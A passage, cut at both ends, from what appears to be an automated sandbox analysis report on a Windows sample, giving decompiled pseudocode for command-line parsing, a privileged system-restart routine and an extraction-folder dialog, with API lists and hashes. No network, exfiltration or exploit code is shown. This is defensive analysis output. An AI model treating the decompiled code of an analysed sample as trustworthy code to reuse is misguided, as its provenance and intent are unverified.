                                                                      															} else {
                                                                      																_t202 = 0x5d;
                                                                      																if(E00F8667F(_t215, _t202) == 0) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	goto L115;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													 *0xf88a24 = 1;
                                                                      												}
                                                                      												goto L50;
                                                                      											} else {
                                                                      												_t100 = _t87 - 1;
                                                                      												if(_t100 == 0) {
                                                                      													L98:
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t217 =  &_v268 + _t170;
                                                                      														_t192 =  &_v268 + _t170;
                                                                      														_t38 = _t192 + 1; // 0x1
                                                                      														_t202 = _t38;
                                                                      														do {
                                                                      															_t101 =  *_t192;
                                                                      															_t192 = _t192 + 1;
                                                                      														} while (_t101 != 0);
                                                                      														if(_t192 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t202 =  &_v276;
                                                                      															_v276 = _t170;
                                                                      															if(E00F85C17(_t217,  &_v276) == 0) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t104 = CharUpperA(_v267);
                                                                      																_t218 = 0xf88b3e;
                                                                      																_t105 = _v276;
                                                                      																if(_t104 != 0x54) {
                                                                      																	_t218 = 0xf88a3a;
                                                                      																}
                                                                      																E00F81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                      																_t202 = 0x104;
                                                                      																E00F8658A(_t218, 0x104, 0xf81140);
                                                                      																if(E00F831E0(_t218) != 0) {
                                                                      																	goto L50;
                                                                      																} else {
                                                                      																	goto L106;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													_t111 = _t100 - 0xa;
                                                                      													if(_t111 == 0) {
                                                                      														if(_v266 != 0) {
                                                                      															if(_v266 != 0x3a) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t199 = _v265;
                                                                      																if(_t199 != 0) {
                                                                      																	_t219 =  &_v265;
                                                                      																	do {
                                                                      																		_t219 = _t219 + 1;
                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                      																		if(_t115 == 0) {
                                                                      																			 *0xf88a2c = 1;
                                                                      																		} else {
                                                                      																			_t200 = 2;
                                                                      																			_t119 = _t115 - _t200;
                                                                      																			if(_t119 == 0) {
                                                                      																				 *0xf88a30 = 1;
                                                                      																			} else {
                                                                      																				if(_t119 == 0xf) {
                                                                      																					 *0xf88a34 = 1;
                                                                      																				} else {
                                                                      																					_t209 = 0;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		_t118 =  *_t219;
                                                                      																		_t199 = _t118;
                                                                      																	} while (_t118 != 0);
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															 *0xf88a2c = 1;
                                                                      														}
                                                                      														goto L50;
                                                                      													} else {
                                                                      														_t127 = _t111 - 3;
                                                                      														if(_t127 == 0) {
                                                                      															if(_v266 != 0) {
                                                                      																if(_v266 != 0x3a) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	_t129 = CharUpperA(_v265);
                                                                      																	if(_t129 == 0x31) {
                                                                      																		goto L76;
                                                                      																	} else {
                                                                      																		if(_t129 == 0x41) {
                                                                      																			goto L83;
                                                                      																		} else {
                                                                      																			if(_t129 == 0x55) {
                                                                      																				goto L76;
                                                                      																			} else {
                                                                      																				goto L49;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																L76:
                                                                      																_push(2);
                                                                      																_pop(1);
                                                                      																L83:
                                                                      																 *0xf88a38 = 1;
                                                                      															}
                                                                      															goto L50;
                                                                      														} else {
                                                                      															_t132 = _t127 - 1;
                                                                      															if(_t132 == 0) {
                                                                      																if(_v266 != 0) {
                                                                      																	if(_v266 != 0x3a) {
                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                      																			goto L49;
                                                                      																		}
                                                                      																	} else {
                                                                      																		_t201 = _v265;
                                                                      																		 *0xf89a2c = 1;
                                                                      																		if(_t201 != 0) {
                                                                      																			_t220 =  &_v265;
                                                                      																			do {
                                                                      																				_t220 = _t220 + 1;
                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                      																				if(_t142 == 0) {
                                                                      																					_t143 = 2;
                                                                      																					 *0xf89a2c =  *0xf89a2c | _t143;
                                                                      																					goto L70;
                                                                      																				} else {
                                                                      																					_t145 = _t142 - 3;
                                                                      																					if(_t145 == 0) {
                                                                      																						 *0xf88d48 =  *0xf88d48 | 0x00000040;
                                                                      																					} else {
                                                                      																						_t146 = _t145 - 5;
                                                                      																						if(_t146 == 0) {
                                                                      																							 *0xf89a2c =  *0xf89a2c & 0xfffffffd;
                                                                      																							goto L70;
                                                                      																						} else {
                                                                      																							_t147 = _t146 - 5;
                                                                      																							if(_t147 == 0) {
                                                                      																								 *0xf89a2c =  *0xf89a2c & 0xfffffffe;
                                                                      																								goto L70;
                                                                      																							} else {
                                                                      																								_t149 = _t147;
                                                                      																								if(_t149 == 0) {
                                                                      																									 *0xf88d48 =  *0xf88d48 | 0x00000080;
                                                                      																								} else {
                                                                      																									if(_t149 == 3) {
                                                                      																										 *0xf89a2c =  *0xf89a2c | 0x00000004;
                                                                      																										L70:
                                                                      																										 *0xf88a28 = 1;
                                                                      																									} else {
                                                                      																										_t209 = 0;
                                                                      																									}
                                                                      																								}
                                                                      																							}
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				_t144 =  *_t220;
                                                                      																				_t201 = _t144;
                                                                      																			} while (_t144 != 0);
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	 *0xf89a2c = 3;
                                                                      																	 *0xf88a28 = 1;
                                                                      																}
                                                                      																goto L50;
                                                                      															} else {
                                                                      																if(_t132 == 0) {
                                                                      																	goto L98;
                                                                      																} else {
                                                                      																	L49:
                                                                      																	_t209 = 0;
                                                                      																	L50:
                                                                      																	_t173 = _v272;
                                                                      																	if( *_t173 != 0) {
                                                                      																		goto L2;
                                                                      																	} else {
                                                                      																		break;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											goto L106;
                                                                      										}
                                                                      									} else {
                                                                      										L34:
                                                                      										_t209 = 0;
                                                                      										break;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L131;
                                                                      					}
                                                                      					if( *0xf88a2c != 0 &&  *0xf88b3e == 0) {
                                                                      						if(GetModuleFileNameA( *0xf89a3c, 0xf88b3e, 0x104) == 0) {
                                                                      							_t209 = 0;
                                                                      						} else {
                                                                      							_t202 = 0x5c;
                                                                      							 *((char*)(E00F866C8(0xf88b3e, _t202) + 1)) = 0;
                                                                      						}
                                                                      					}
                                                                      					_t63 = _t209;
                                                                      				}
                                                                      				L131:
                                                                      			}


































































                                                                      0x00f85e47
                                                                      0x00f85e4a
                                                                      0x00f861d2
                                                                      0x00f861e2
                                                                      0x00f861e7
                                                                      0x00f861ee
                                                                      0x00f861f1
                                                                      0x00f861f1
                                                                      0x00f861f8
                                                                      0x00f861f8
                                                                      0x00f85e50
                                                                      0x00f85e53
                                                                      0x00f86109
                                                                      0x00f8611f
                                                                      0x00000000
                                                                      0x00f86125
                                                                      0x00f86137
                                                                      0x00f8613a
                                                                      0x00f8613c
                                                                      0x00f8613e
                                                                      0x00f8613e
                                                                      0x00f86141
                                                                      0x00f86141
                                                                      0x00f86143
                                                                      0x00f86144
                                                                      0x00f8614a
                                                                      0x00000000
                                                                      0x00f86150
                                                                      0x00f86152
                                                                      0x00f8615c
                                                                      0x00f86170
                                                                      0x00f86172
                                                                      0x00f8617c
                                                                      0x00f86190
                                                                      0x00f86190
                                                                      0x00f86196
                                                                      0x00f861a5
                                                                      0x00000000
                                                                      0x00f861ab
                                                                      0x00f861b9
                                                                      0x00f861c6
                                                                      0x00f861c6
                                                                      0x00f8617e
                                                                      0x00f86180
                                                                      0x00f8618a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8618a
                                                                      0x00f8615e
                                                                      0x00f86160
                                                                      0x00f8616a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8616a
                                                                      0x00f8615c
                                                                      0x00f8614a
                                                                      0x00f8610b
                                                                      0x00f8610e
                                                                      0x00f8610e
                                                                      0x00000000
                                                                      0x00f85e59
                                                                      0x00f85e59
                                                                      0x00f85e5c
                                                                      0x00f8604f
                                                                      0x00f86056
                                                                      0x00000000
                                                                      0x00f8605c
                                                                      0x00f8606e
                                                                      0x00f86071
                                                                      0x00f86073
                                                                      0x00f86075
                                                                      0x00f86075
                                                                      0x00f86078
                                                                      0x00f86078
                                                                      0x00f8607a
                                                                      0x00f8607b
                                                                      0x00f86081
                                                                      0x00000000
                                                                      0x00f86087
                                                                      0x00f86087
                                                                      0x00f8608d
                                                                      0x00f8609c
                                                                      0x00000000
                                                                      0x00f860a2
                                                                      0x00f860aa
                                                                      0x00f860b2
                                                                      0x00f860b7
                                                                      0x00f860bd
                                                                      0x00f860bf
                                                                      0x00f860bf
                                                                      0x00f860d6
                                                                      0x00f860e0
                                                                      0x00f860e7
                                                                      0x00f860f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f860f5
                                                                      0x00f8609c
                                                                      0x00f86081
                                                                      0x00f85e62
                                                                      0x00f85e62
                                                                      0x00f85e65
                                                                      0x00f85fd3
                                                                      0x00f85fe9
                                                                      0x00000000
                                                                      0x00f85fef
                                                                      0x00f85fef
                                                                      0x00f85ff7
                                                                      0x00f85ffd
                                                                      0x00f86003
                                                                      0x00f86006
                                                                      0x00f86011
                                                                      0x00f86014
                                                                      0x00f8603d
                                                                      0x00f86016
                                                                      0x00f86018
                                                                      0x00f86019
                                                                      0x00f8601b
                                                                      0x00f86033
                                                                      0x00f8601d
                                                                      0x00f86020
                                                                      0x00f86029
                                                                      0x00f86022
                                                                      0x00f86022
                                                                      0x00f86022
                                                                      0x00f86020
                                                                      0x00f8601b
                                                                      0x00f86042
                                                                      0x00f86044
                                                                      0x00f86046
                                                                      0x00f8604a
                                                                      0x00f85ff7
                                                                      0x00f85fd5
                                                                      0x00f85fd8
                                                                      0x00f85fd8
                                                                      0x00000000
                                                                      0x00f85e6b
                                                                      0x00f85e6b
                                                                      0x00f85e6e
                                                                      0x00f85f8b
                                                                      0x00f85f99
                                                                      0x00000000
                                                                      0x00f85f9f
                                                                      0x00f85fa7
                                                                      0x00f85faf
                                                                      0x00000000
                                                                      0x00f85fb1
                                                                      0x00f85fb3
                                                                      0x00000000
                                                                      0x00f85fb5
                                                                      0x00f85fb7
                                                                      0x00000000
                                                                      0x00f85fb9
                                                                      0x00000000
                                                                      0x00f85fb9
                                                                      0x00f85fb7
                                                                      0x00f85fb3
                                                                      0x00f85faf
                                                                      0x00f85f8d
                                                                      0x00f85f8d
                                                                      0x00f85f8d
                                                                      0x00f85f8f
                                                                      0x00f85fc1
                                                                      0x00f85fc1
                                                                      0x00f85fc1
                                                                      0x00000000
                                                                      0x00f85e74
                                                                      0x00f85e74
                                                                      0x00f85e77
                                                                      0x00f85ea0
                                                                      0x00f85ebd
                                                                      0x00f85f79
                                                                      0x00000000
                                                                      0x00f85f7f
                                                                      0x00f85ec3
                                                                      0x00f85ec3
                                                                      0x00f85ecc
                                                                      0x00f85ed4
                                                                      0x00f85ed6
                                                                      0x00f85edc
                                                                      0x00f85edf
                                                                      0x00f85eea
                                                                      0x00f85eed
                                                                      0x00f85f3f
                                                                      0x00f85f40
                                                                      0x00000000
                                                                      0x00f85eef
                                                                      0x00f85eef
                                                                      0x00f85ef2
                                                                      0x00f85f34
                                                                      0x00f85ef4
                                                                      0x00f85ef4
                                                                      0x00f85ef7
                                                                      0x00f85f2b
                                                                      0x00000000
                                                                      0x00f85ef9
                                                                      0x00f85ef9
                                                                      0x00f85efc
                                                                      0x00f85f22
                                                                      0x00000000
                                                                      0x00f85efe
                                                                      0x00f85eff
                                                                      0x00f85f02
                                                                      0x00f85f16
                                                                      0x00f85f04
                                                                      0x00f85f07
                                                                      0x00f85f0d
                                                                      0x00f85f46
                                                                      0x00f85f46
                                                                      0x00f85f09
                                                                      0x00f85f09
                                                                      0x00f85f09
                                                                      0x00f85f07
                                                                      0x00f85f02
                                                                      0x00f85efc
                                                                      0x00f85ef7
                                                                      0x00f85ef2
                                                                      0x00f85f4c
                                                                      0x00f85f4e
                                                                      0x00f85f50
                                                                      0x00f85f54
                                                                      0x00f85ed4
                                                                      0x00f85ea2
                                                                      0x00f85ea4
                                                                      0x00f85eaf
                                                                      0x00f85eaf
                                                                      0x00000000
                                                                      0x00f85e79
                                                                      0x00f85e7d
                                                                      0x00000000
                                                                      0x00f85e83
                                                                      0x00f85e83
                                                                      0x00f85e83
                                                                      0x00f85e85
                                                                      0x00f85e85
                                                                      0x00f85e8e
                                                                      0x00000000
                                                                      0x00f85e94
                                                                      0x00000000
                                                                      0x00f85e94
                                                                      0x00f85e8e
                                                                      0x00f85e7d
                                                                      0x00f85e77
                                                                      0x00f85e6e
                                                                      0x00f85e65
                                                                      0x00f85e5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85dd0
                                                                      0x00f85dd0
                                                                      0x00f85dd0
                                                                      0x00000000
                                                                      0x00f85dd0
                                                                      0x00f85dce
                                                                      0x00f85dca
                                                                      0x00f85dba
                                                                      0x00000000
                                                                      0x00f85d00
                                                                      0x00f85dd9
                                                                      0x00f85e04
                                                                      0x00f861fe
                                                                      0x00f85e0a
                                                                      0x00f85e0c
                                                                      0x00f85e17
                                                                      0x00f85e17
                                                                      0x00f85e04
                                                                      0x00f86200
                                                                      0x00f86200
                                                                      0x00000000

                                                                      APIs
                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 00F85CEE
                                                                      • GetModuleFileNameA.KERNEL32(00F88B3E,00000104,00000000,?,?), ref: 00F85DFC
                                                                      • CharUpperA.USER32(?), ref: 00F85E3E
                                                                      • CharUpperA.USER32(-00000052), ref: 00F85EE1
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F85F6F
                                                                      • CharUpperA.USER32(?), ref: 00F85FA7
                                                                      • CharUpperA.USER32(-0000004E), ref: 00F86008
                                                                      • CharUpperA.USER32(?), ref: 00F860AA
                                                                      • CloseHandle.KERNEL32(00000000,00F81140,00000000,00000040,00000000), ref: 00F861F1
                                                                      • ExitProcess.KERNEL32 ref: 00F861F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                      • String ID: "$"$:$RegServer
                                                                      • API String ID: 1203814774-25366791
                                                                      • Opcode ID: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                      • Instruction ID: 4be49d7b08efaafca0050c4b00601d8dd3bff84834d3d27bd47d0278601c40ec
                                                                      • Opcode Fuzzy Hash: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                      • Instruction Fuzzy Hash: ABD17D72E08A585FDF35BB388C4C3F53BA1AB16B64F5401EAC486DA191D7748E86BF01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E00F81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                      				void* _v28;
                                                                      				void* __ebx;
                                                                      				signed int _t13;
                                                                      				int _t21;
                                                                      				void* _t25;
                                                                      				int _t28;
                                                                      				signed char _t30;
                                                                      				void* _t38;
                                                                      				void* _t40;
                                                                      				void* _t41;
                                                                      				signed int _t46;
                                                                      
                                                                      				_t41 = __esi;
                                                                      				_t38 = __edi;
                                                                      				_t30 = __ecx;
                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                      					L12:
                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                      						L14:
                                                                      						if( *0xf89a40 != 0) {
                                                                      							_pop(_t30);
                                                                      							_t44 = _t46;
                                                                      							_t13 =  *0xf88004; // 0x644c7055
                                                                      							_v8 = _t13 ^ _t46;
                                                                      							_push(_t38);
                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                      								_v24.PrivilegeCount = 1;
                                                                      								_v12 = 2;
                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                      								CloseHandle(_v28);
                                                                      								_t41 = _t41;
                                                                      								_push(0);
                                                                      								if(_t21 != 0) {
                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                      										_t25 = 1;
                                                                      									} else {
                                                                      										_t37 = 0x4f7;
                                                                      										goto L3;
                                                                      									}
                                                                      								} else {
                                                                      									_t37 = 0x4f6;
                                                                      									goto L4;
                                                                      								}
                                                                      							} else {
                                                                      								_t37 = 0x4f5;
                                                                      								L3:
                                                                      								_push(0);
                                                                      								L4:
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								E00F844B9(0, _t37);
                                                                      								_t25 = 0;
                                                                      							}
                                                                      							_pop(_t40);
                                                                      							return E00F86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                      						} else {
                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                      							goto L16;
                                                                      						}
                                                                      					} else {
                                                                      						_t37 = 0x522;
                                                                      						_t28 = E00F844B9(0, 0x522, 0xf81140, 0, 0x40, 4);
                                                                      						if(_t28 != 6) {
                                                                      							goto L16;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					__eax = E00F81EA7(__ecx);
                                                                      					if(__eax != 2) {
                                                                      						L16:
                                                                      						return _t28;
                                                                      					} else {
                                                                      						goto L12;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00F81EFB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F81F02
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00F81FD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2795981589-3733053543
                                                                      • Opcode ID: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                      • Instruction ID: 863b8c94d020b1e36eb1bf2d852f6b3e2791c4a04108dd37feb749b97ee84a52
                                                                      • Opcode Fuzzy Hash: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                      • Instruction Fuzzy Hash: 7A218871F402096AEB207BA19C4EFFB76BCFB85B61F100219FB06D6181D7798842B761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F86CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                      
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				UnhandledExceptionFilter(_a4);
                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                      			}



                                                                      0x00f86cf7
                                                                      0x00f86d00
                                                                      0x00f86d19

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86CF7
                                                                      • UnhandledExceptionFilter.KERNEL32(00F86E26,?,00F86E26,00F81000), ref: 00F86D00
                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00F86E26,00F81000), ref: 00F86D0B
                                                                      • TerminateProcess.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86D12
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                      • String ID:
                                                                      • API String ID: 3231755760-0
                                                                      • Opcode ID: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                      • Instruction ID: bb9024d3069dc1ac8d5d4addee58cdd0ef5b690df018dd5a5755c719aaf9839b
                                                                      • Opcode Fuzzy Hash: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                      • Instruction Fuzzy Hash: 96D0C93200090CBBFB002BE1EC0CAA93F28EB48616F484002F31982021CA364451AF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E00F83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* __edi;
                                                                      				void* _t6;
                                                                      				void* _t10;
                                                                      				int _t20;
                                                                      				int _t21;
                                                                      				int _t23;
                                                                      				char _t24;
                                                                      				long _t25;
                                                                      				int _t27;
                                                                      				int _t30;
                                                                      				void* _t32;
                                                                      				int _t33;
                                                                      				int _t34;
                                                                      				int _t37;
                                                                      				int _t38;
                                                                      				int _t39;
                                                                      				void* _t42;
                                                                      				void* _t46;
                                                                      				CHAR* _t49;
                                                                      				void* _t58;
                                                                      				void* _t63;
                                                                      				struct HWND__* _t64;
                                                                      
                                                                      				_t64 = _a4;
                                                                      				_t6 = _a8 - 0x10;
                                                                      				if(_t6 == 0) {
                                                                      					_push(0);
                                                                      					L38:
                                                                      					EndDialog(_t64, ??);
                                                                      					L39:
                                                                      					__eflags = 1;
                                                                      					return 1;
                                                                      				}
                                                                      				_t42 = 1;
                                                                      				_t10 = _t6 - 0x100;
                                                                      				if(_t10 == 0) {
                                                                      					E00F843D0(_t64, GetDesktopWindow());
                                                                      					SetWindowTextA(_t64, "lenta");
                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                      					__eflags =  *0xf89a40 - _t42; // 0x3
                                                                      					if(__eflags == 0) {
                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                      					}
                                                                      					L36:
                                                                      					return _t42;
                                                                      				}
                                                                      				if(_t10 == _t42) {
                                                                      					_t20 = _a12 - 1;
                                                                      					__eflags = _t20;
                                                                      					if(_t20 == 0) {
                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xf891e4, 0x104);
                                                                      						__eflags = _t21;
                                                                      						if(_t21 == 0) {
                                                                      							L32:
                                                                      							_t58 = 0x4bf;
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							L25:
                                                                      							E00F844B9(_t64, _t58);
                                                                      							goto L39;
                                                                      						}
                                                                      						_t49 = 0xf891e4;
                                                                      						do {
                                                                      							_t23 =  *_t49;
                                                                      							_t49 =  &(_t49[1]);
                                                                      							__eflags = _t23;
                                                                      						} while (_t23 != 0);
                                                                      						__eflags = _t49 - 0xf891e5 - 3;
                                                                      						if(_t49 - 0xf891e5 < 3) {
                                                                      							goto L32;
                                                                      						}
                                                                      						_t24 =  *0xf891e5; // 0x3a
                                                                      						__eflags = _t24 - 0x3a;
                                                                      						if(_t24 == 0x3a) {
                                                                      							L21:
                                                                      							_t25 = GetFileAttributesA(0xf891e4);
                                                                      							__eflags = _t25 - 0xffffffff;
                                                                      							if(_t25 != 0xffffffff) {
                                                                      								L26:
                                                                      								E00F8658A(0xf891e4, 0x104, 0xf81140);
                                                                      								_t27 = E00F858C8(0xf891e4);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 != 0) {
                                                                      									__eflags =  *0xf891e4 - 0x5c;
                                                                      									if( *0xf891e4 != 0x5c) {
                                                                      										L30:
                                                                      										_t30 = E00F8597D(0xf891e4, 1, _t64, 1);
                                                                      										__eflags = _t30;
                                                                      										if(_t30 == 0) {
                                                                      											L35:
                                                                      											_t42 = 1;
                                                                      											__eflags = 1;
                                                                      											goto L36;
                                                                      										}
                                                                      										L31:
                                                                      										_t42 = 1;
                                                                      										EndDialog(_t64, 1);
                                                                      										goto L36;
                                                                      									}
                                                                      									__eflags =  *0xf891e5 - 0x5c;
                                                                      									if( *0xf891e5 == 0x5c) {
                                                                      										goto L31;
                                                                      									}
                                                                      									goto L30;
                                                                      								}
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_t58 = 0x4be;
                                                                      								goto L25;
                                                                      							}
                                                                      							_t32 = E00F844B9(_t64, 0x54a, 0xf891e4, 0, 0x20, 4);
                                                                      							__eflags = _t32 - 6;
                                                                      							if(_t32 != 6) {
                                                                      								goto L35;
                                                                      							}
                                                                      							_t33 = CreateDirectoryA(0xf891e4, 0);
                                                                      							__eflags = _t33;
                                                                      							if(_t33 != 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0xf891e4);
                                                                      							_t58 = 0x4cb;
                                                                      							goto L25;
                                                                      						}
                                                                      						__eflags =  *0xf891e4 - 0x5c;
                                                                      						if( *0xf891e4 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						__eflags = _t24 - 0x5c;
                                                                      						if(_t24 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						goto L21;
                                                                      					}
                                                                      					_t34 = _t20 - 1;
                                                                      					__eflags = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						EndDialog(_t64, 0);
                                                                      						 *0xf89124 = 0x800704c7;
                                                                      						goto L39;
                                                                      					}
                                                                      					__eflags = _t34 != 0x834;
                                                                      					if(_t34 != 0x834) {
                                                                      						goto L36;
                                                                      					}
                                                                      					_t37 = LoadStringA( *0xf89a3c, 0x3e8, 0xf88598, 0x200);
                                                                      					__eflags = _t37;
                                                                      					if(_t37 != 0) {
                                                                      						_t38 = E00F84224(_t64, _t46, _t46);
                                                                      						__eflags = _t38;
                                                                      						if(_t38 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xf887a0);
                                                                      						__eflags = _t39;
                                                                      						if(_t39 != 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t63 = 0x4c0;
                                                                      						L9:
                                                                      						E00F844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						goto L38;
                                                                      					}
                                                                      					_t63 = 0x4b1;
                                                                      					goto L9;
                                                                      				}
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • LoadStringA.USER32(000003E8,00F88598,00000200), ref: 00F83271
                                                                      • GetDesktopWindow.USER32 ref: 00F833E2
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F833F7
                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F83410
                                                                      • GetDlgItem.USER32(?,00000836), ref: 00F83426
                                                                      • EnableWindow.USER32(00000000), ref: 00F8342D
                                                                      • EndDialog.USER32(?,00000000), ref: 00F8343F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
